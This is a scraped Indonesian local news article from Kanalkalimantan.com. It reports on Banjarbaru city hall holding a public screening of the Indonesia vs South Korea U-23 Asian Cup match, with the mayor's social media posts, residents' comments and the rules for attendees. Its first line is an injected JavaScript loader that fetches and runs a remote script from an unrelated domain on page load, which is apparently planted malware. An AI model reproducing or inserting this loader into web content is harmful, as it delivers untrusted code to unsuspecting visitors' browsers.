(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Balai Kota Banjarbaru Gelar Nobar, Begini Ragam Respon Warga


KANALKALIMANTAN.COM, BANJARBARU – Balai Kota Banjarbaru akan menjadi lokasi nonton bareng (Nobar) laga Timnas Indonesia vs Korea Selatan di ajang perempat final atau babak 8 besar Piala Asia U-23 2024, Jumat (26/4/2024) dini hari.

Laga dari Stadion Abdullah bin Khalifa itu menarik minat segenap masyarakat di Provinsi Kalimantan Selatan (Kalsel) untuk menggelar nobar.

Tak terkecuali Pemerintah Kota Banjarbaru yang mengajak masyarakat untuk datang memberikan dukungan kepada Timnas Indonesia U-23.

Dalam akun instagram resminya, Wali Kota Banjarbaru Aditya Mufti Ariffin menuliskan, “Pas konser Kerispatih semalam ulun mendangar suara ribut-ribut galau di belakang ulun, sekalinya ada yang kada fokus menggalau gara-gara nonton Timnas”.

“Ulun pantau jua di sosmed banyak yang mengiyau ulun supaya ada nonton bareng. Nah Alhamdulillah, ini kalo yang buhan pian hadang-hadang? Jangan kada datang lah,” tulisnya menyambung.

Baca juga: Relokasi 70 Rumah Bantaran Sungai Kuranji, Pemko Banjarbaru Proyeksikan Anggaran Rp15 Miliar

Postingan itu pun akhirnya mengundang segudang like dan ratusan komentar dari pendukung setia Rizky Ridho dan kawan-kawan ini.

Seperti komentar yang dituliskan oleh akun @bartman_bjb mengatakan, “Nah ini pak ae mun kawa mun kawa terus berlanjut untuk laga-laga selanjutnya. Langsung rapatkan barisan”.

Dari akun bernama @myusuferlanggaaa, yang dipin juga berkomentar “Mantap pak wali #ayokebanjarbaru jangan sampai ada yang anarkis wal biar kawa berkelanjutan”.

Tanggapan menarik lain juga dituliskan oleh akun @ryno_devilz “Jangan lupa bawa pasangan, karena pasti dingin jam segitu,”.

Sementara itu akun @razidan.astradaihatsu mengingatkan dalam komentarnya, “Jangan kada ingat yang nonton kena datang barasih bulik simpun lah, supaya pak wali kada jara”.

Baca juga: Nobar Piala Asia U-23 Indonesia Vs Korea Selatan di Balai Kota Banjarmasin

Kebahagian turut disampaikan oleh pemilik akun @h.aditya katanya “Pas handak bejualan kopi nah di muka situ”.

Senada akun bernama @ninis_tataaa mengatakan “Waaahh berkahh paman pentol, pamas es, paman parkir nah di Murdjani”.

Sementara nobar dilaksakan di halaman Balai Kota Banjarmasin Jalan Panglima Batur nomor 1, Kecamatan Banjarbaru Utara, Kota Banjarbaru.

Dini hari ini, Pemko Banjarbaru akan memanfaatkan videotron yang terletak di depan Balai Kota sebagai layar untuk menonton pertandingan.

Dalam postingan kedua, Wali Kota Aditya menyampaikan sejumlah himbauan kepada masyarakat yang bakal menonton nobar nantinya.

Baca juga: Lepas Kafilah ke MTQ Provinsi, Bupati Banjar Optimistis Juara Umum Lagi

Imbauan yang diberikan seperti menjaga kebersihan dan ketertiban juga tidak membuang sampah sembarangan, tidak membawa atau menyalakan flare atau sejenisnya, tidak membawa senjata berbahaya.

Kemudian tidak boleh melakukan aktivitas konvoi atau aktivitas keramaian lainnya, tidak membawa atribut atau bendera partai, dilarang membawa dan mengkonsumsi minuman keras, serta tak lupa membawa alas duduk masing-masing.

Tertuliskan juga nobar dimulai pada Jumat (26/4/2024) pukul 01.30 Wita dini hari. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie


Muhammad Andi

Recent Posts

Bupati Banjar Serahkan Bonus untuk Kafilah Kabupaten Banjar, Segini Rinciannya

KANALKALIMANTAN.COM, MARTAPURA -  Pemerintah Kabupaten Banjar melakukan syukuran atas prestasi yang diraih kafilah Kabupaten Banjar,… Read More

3 menit ago

Proyek Trotoar Jalan Kemuning Langsung Drainase, Begini Respon Warga yang Pagarnya Kena Bongkar

KANALKALIMANTAN.COM, BANJARBARU - Proyek penataan Jalan Kemuning, Kecamatan Banjarbaru Selatan, Kota Banjarbaru, dengan penyedian trotoar… Read More

55 menit ago

35 Peserta Ikuti Bimtek Pengawasan Jalan dan Jembatan Dinas PUPR Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Provinsi Kalimantan Selatan (Kalsel) melalui Dinas Pekerjaan Umum dan Penataan Ruang… Read More

2 jam ago

H Muhidin Siap Lamar Semua Parpol, Incar Cagub Kalsel Gandeng Hasnur

KANALKALIMANTAN.COM, BANJARMASIN - Keinginan Ketua Umum Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN) Kalimantan… Read More

3 jam ago

Pabrik Sepatu Bata Tutup, Simpan Kenangan Haru Soekarno dan Megawati Soekarnoputri

KANALKALIMANTAN.COM, - Kabar menyedihkan datang dari salah satu perusahaan sepatu bersejarah di Indonesia yakni Bata.… Read More

3 jam ago

Pembangunan Trotoar Jalan Kemuning Dimulai, Beberapa Pagar Warga Kena Penggalian

KANALKALIMANTAN.COM, BANJARBARU – Pembangunan trotoar di kawasan Jalan Kemuning Banjarbaru, Kecamatan Banjarbaru Selatan, Kota Banjarbaru,… Read More

3 jam ago

This website uses cookies.